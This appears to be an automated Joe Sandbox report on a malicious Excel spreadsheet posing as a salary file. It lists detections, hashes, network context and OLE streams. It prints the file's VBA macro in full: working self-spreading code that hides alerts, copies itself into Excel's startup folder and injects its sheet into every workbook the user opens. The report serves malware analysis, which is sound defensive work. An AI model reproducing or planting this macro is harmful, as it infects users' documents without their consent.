Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\splwow64.exe

Window / User API: threadDelayed 429

Jump to behavior

Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	2 Exploitation for Client Execution	2 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Extra Window Memory Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Extra Window Memory Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Salary 2025- workers-v1.xls	100%	Avira	HEUR/Macro.Downloader.MRACS.Gen
Salary 2025- workers-v1.xls	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0014.t-0009.t-msedge.net	13.107.246.42	true	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
13.107.246.42	s-part-0014.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559179
Start date and time:	2024-11-20 09:16:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Salary 2025- workers-v1.xls
Detection:	MAL
Classification:	mal52.winXLS@3/4@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xls

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.28.47, 52.113.194.132, 184.28.90.27, 13.89.179.8
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdcus06.centralus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.n
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Salary 2025- workers-v1.xls

Simulations

Behavior and APIs

Time	Type	Description
03:18:32	API Interceptor	446x Sleep call for process: splwow64.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.246.42	https://protect-us.mimecast.com/s/FVibCzpzxLsxEMXAhgAOBC	Get hash	malicious	Unknown	Browse	www.mimecast.com/Customers/Support/Contact-support/
	http://border-fd.smartertechnologies.com/	Get hash	malicious	Unknown	Browse	border-fd.smartertechnologies.com/
	https://protect-us.mimecast.com/s/4MrPCrkvgotDWxrNCzxa8p	Get hash	malicious	Unknown	Browse	www.mimecast.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0014.t-0009.t-msedge.net	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42
	Credit_DetailsCBS24312017915.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://www.amtso.org/check-desktop-phishing-page/	Get hash	malicious	Unknown	Browse	13.107.246.42
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42
	INVOICE DUE.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.42
	PO-54752454235.hta	Get hash	malicious	Remcos	Browse	13.107.246.42
	http://frenzelit.powerappsportals.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.107.246.42
	https://gen-techs.site/s/ind.html#123@123.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.42

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	PO-000041492.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	Credit_DetailsCBS24312017915.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.45
	Payment Advice.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.60
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.45
	arm7.nn-20241120-0508.elf	Get hash	malicious	Mirai, Okiru	Browse	21.45.10.209
	arm.nn-20241120-0508.elf	Get hash	malicious	Mirai, Okiru	Browse	20.124.214.104

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	13.107.246.42
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42
	PO-000041492.xls	Get hash	malicious	Unknown	Browse	13.107.246.42
	Credit_DetailsCBS24312017915.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.42
	Payment Advice.xls	Get hash	malicious	Unknown	Browse	13.107.246.42
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.42
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.42

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	3.12078184246611
Encrypted:	false
SSDEEP:	96:MlHY1GpNnyn3ajMDxZoPay/9beX98Qy1vDp+fp4YgA6PrYhZ9p6Ka7is:MlzytCDRC+Sl6PUhTAKa
MD5:	50F83308869E593040C36F7BB477E559
SHA1:	E60766ADF2F3883DA5114FF664D2B77BCAB0E198
SHA-256:	0E8B54B36E1DBDC206D1BAB37E17CDDEC0BA764818E68905275C744C72232E46
SHA-512:	E970288A8E0EF225934A0C54B49A1C42E826CF62C029184223F55563DD12D8D426BE1701E8E8015C63B5EBDE74CE4CCC93AB499D0EB283F26A22A192EB38C9B5
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD4A5D58B07B985D6.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	2.3470112157064933
Encrypted:	false
SSDEEP:	192:jvKruKW9J43AgdLSUX7qIF4kBez2CWeXjV1RKjc1uHQJib0tG/9gpUOgGMb9H39T:zKrDFhF4PnuTWCGt
MD5:	92D85E1B6A3465F0170B75D492EAAA74
SHA1:	814183DA7E9D34A1750B13AA25BF69F4DB7FC8F7
SHA-256:	4F6CCFB8CF96E8558BF8EC13656BE3D79F1B0A15997F3979A3CE6FE549E0A27F
SHA-512:	F70C70F3A0CC56DDDB7E77CB66E59D20A4B59E186341470238986C22A2538F1861698BB27580D5D486C4692F3F6AD7A43EE74646F141C50A6625C7E50E4FD7DF
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\mypersonnel.xls

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: SM & You, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 11 08:46:49 2021, Last Saved Time/Date: Wed Nov 20 08:17:27 2024, Security: 0
Category:	dropped
Size (bytes):	128000
Entropy (8bit):	4.772147427746537
Encrypted:	false
SSDEEP:	3072:yCzbkJxEtjPOtioVjDGUU1qfDlaGGx+cx18gUsAeHSwpbNXnLwGyjsCHVwOu4AXS:wxEtjPOtioVjDGUU1qfDlavx+818gUsE
MD5:	DA370E238F05B56EE96BFF20C28DAB53
SHA1:	8AD4472721DCE0DAE7A1E0732BAE6F9DF6493A60
SHA-256:	F6D7F10348EC09341AEAF6F346E81A1BE09B210F241AAD9F4C71490AED13FF79
SHA-512:	6A11DFC830E05CD423149E6D2FF20B361F6E1A0D9510F41EFF96D5DC4AA167B2B037EF010D8991C691195B8BA6947581843BFC1B475098B087E8336BA89D3859
Malicious:	false
Reputation:	low
Preview:	......................>.......................................................b........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...c.......d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Documents\~$mypersonnel.xls

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.3520167401771568
Encrypted:	false
SSDEEP:	3:8Nultln:X1n
MD5:	9AC4D67F6E514F452D4A1DB79CE3B2E8
SHA1:	33F8C665ECBB81275D2E49D48F2565A58A282043
SHA-256:	407E1D871964C93DBDBD4D00613CD0A9E30D3ED6352D8052C58E7A252D52FC5A
SHA-512:	018D0F54AB0AB01F27E9FB870A128F2F581A58487399DD7FB56A94EC4AAEC6874708A5AD5650F362485E45E2C6A557ED08524C5B8335F83F240E0962281A0F1A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user ..c.a.l.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1258, Author: SM & You, Last Saved By: THA NGUYEN, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 11 08:46:49 2021, Last Saved Time/Date: Wed Nov 20 08:05:33 2024, Security: 0
Entropy (8bit):	4.776274699794475
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Salary 2025- workers-v1.xls
File size:	124'416 bytes
MD5:	db0d2d8342343528bb33649e91bb6f3d
SHA1:	7e00d44d5b05912a2e42c5408fefed8396710b24
SHA256:	abd87359790b24e8ac8464d3af8688b08248ca84c14dd97f1b6f33e8c297a3b8
SHA512:	fb842d348c99fc2a5a995f2ab9f37de69c05177acfe4a360367b7c2a46f192e0b96c453ef45a98a305e50ecf53d48efe79935e5d5a1f8d537b7371acddcd5f8b
SSDEEP:	3072:iKrDS+xEtjPOtioVjDGUU1qfDlaGGx+cx18gUsAeeSwpbNXnLwHMj2iGOPdLimAH:hxEtjPOtioVjDGUU1qfDlavx+818gUsZ
TLSH:	A1C3A652F79B8C88F969C73ABDD707606731EC91ABB29307638873185EB79805A33741
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	35ed8e920e8c81b5

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "Salary 2025- workers-v1.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1258
Author:	SM & You
Last Saved By:	THA NGUYEN
Create Time:	2021-01-11 08:46:49
Last Saved Time:	2024-11-20 08:05:33
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1258
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Kangatang, Stream Size: 2955

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Kangatang
VBA File Name:	Kangatang
Stream Size:	2955
Data ASCII:	. . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . 1 n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . P . . . . . 6 . . . . . . . . . . . . . . . . . L . . . . . L . . . . . L . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 06 f0 00 00 00 bc 04 00 00 d4 00 00 00 d8 01 00 00 ff ff ff ff 7b 05 00 00 87 09 00 00 01 00 00 00 01 00 00 00 31 a8 6e bd 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Kangatang"

Sub Auto_Open()
Application.EnableCancelKey = xlDisabled


'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
    Application.ScreenUpdating = False
    Windows(1).Visible = False
    ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
    Windows(1).Visible = True
End If

    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub

Sub allocated()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
    Application.ScreenUpdating = False
    currentsh = ActiveSheet.Name
    ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
    ActiveWorkbook.Sheets(currentsh).Select
    Application.ScreenUpdating = True
 End If
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	108
Entropy:	4.188499988527259
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 236

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	236
Entropy:	2.7640880482745716
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 96 00 00 00 02 00 00 00 ea 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 216

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	216
Entropy:	3.721686438120175
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . \\ . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S M & Y o u . . . . . . . . . . . . T H A N G U Y E N . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . L . @ . . . " ; . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a8 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 70 00 00 00 0c 00 00 00 88 00 00 00 0d 00 00 00 94 00 00 00 13 00 00 00 a0 00 00 00 02 00 00 00 ea 04 00 00 1e 00 00 00 0c 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 109758

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	109758
Entropy:	4.820077150727378
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T H A N G U Y E N B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . P . P 8 " 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 0a 00 00 54 48 41 20 4e 47 55 59 45 4e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 309

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	309
Entropy:	5.244459014114699
Base64 Encoded:	True
Data ASCII:	I D = " { 2 7 7 2 3 D 3 E - 1 1 1 9 - 4 7 6 9 - A 7 3 7 - A 2 8 7 3 B F 0 C C E 4 } " . . M o d u l e = K a n g a t a n g . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 3 1 1 D 2 C 1 E 1 C 5 E 1 C 5 E 1 C 5 E 1 C 5 " . . D P B = " 2 6 2 4 E 7 F 6 E 9 1 A F D 1 B F D 1 B F D " . . G C = " 3 9 3 B F 8 F D F 9 F D F 9 0 2 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0 0 1 = { 3
Data Raw:	49 44 3d 22 7b 32 37 37 32 33 44 33 45 2d 31 31 31 39 2d 34 37 36 39 2d 41 37 33 37 2d 41 32 38 37 33 42 46 30 43 43 45 34 7d 22 0d 0a 4d 6f 64 75 6c 65 3d 4b 61 6e 67 61 74 61 6e 67 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 32 3d 22 33 39 33 32 32 32

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 32

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	32
Entropy:	2.224601752714581
Base64 Encoded:	False
Data ASCII:	K a n g a t a n g . K . a . n . g . a . t . a . n . g . . . . .
Data Raw:	4b 61 6e 67 61 74 61 6e 67 00 4b 00 61 00 6e 00 67 00 61 00 74 00 61 00 6e 00 67 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2603

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2603
Entropy:	4.257434479295426
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ .
Data Raw:	cc 61 b2 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1336

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
CLSID:
File Type:	data
Stream Size:	1336
Entropy:	3.952411484964291
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . L O E > . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a b2 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 02 00 00 7e 01 00 00 7e 6d 00 00 7f 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 66

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
CLSID:
File Type:	data
Stream Size:	66
Entropy:	1.7549422714340965
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 74 00 00 7f 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 822

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
CLSID:
File Type:	data
Stream Size:	822
Entropy:	3.9272228834115355
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . ~ \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . Q . . . . . . . X . . . . . . . . . . % . . . . . . . . . x . . . $ . . . . . . . . x . < . . . . x . " . . . . . . x . . . $ . . . . . . . . x . . . . . x . . K . \\ . t . . . . . x . . . . . . . $ . . . . . . . x . 0 . . . l t . l . . . . . p . . . $ . . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 02 00 02 00 09 00 00 00 c9 07 00 00 00 00 00 00 41 06 00 00 00 00 00 00 19 06 00 00 00 00 00 00 69 06 00 00 00 00 00 00 91 06 00 00 00 00 00 00 b9 06 00 00 00 00 00 00 e1 06 00 00 00 00 00 00 39 07 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 140

General
